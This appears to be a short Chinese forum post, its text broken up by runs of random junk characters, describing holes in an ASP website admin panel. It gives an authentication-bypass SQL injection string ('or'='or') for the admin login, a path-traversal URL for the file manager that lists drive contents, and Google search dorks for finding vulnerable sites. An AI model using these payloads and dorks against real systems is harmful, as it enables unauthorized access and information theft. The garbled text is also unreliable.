后台万能密码 'or'='or'/ [% O8 _; T2 S( F3 Z$ V
- `; }$ x$ H. p7 p0 d, ]- C4 a后台文件管理存在绕过。导致浏览所在盘符信息。信息泄露!" g! C7 y- d. f* L3 k
admin/uploadfile.asp?currentFolder=/upfiles/../% r2 e! @! n6 b5 Y7 k
9 y# x, x, p2 n# G# R9 i) ~) q漏洞证明:
* c k( l. {" V
5 A- N# m( }2 I, X% d谷歌:inurl:type.asp?id=1 新闻中心 W2 A; o( ~- ]
或者 :inurl:download_ok.asp?
1 `+ E9 n6 Z' m7 N0 S) ?
' }; K9 j) a, k/ y; `0 I |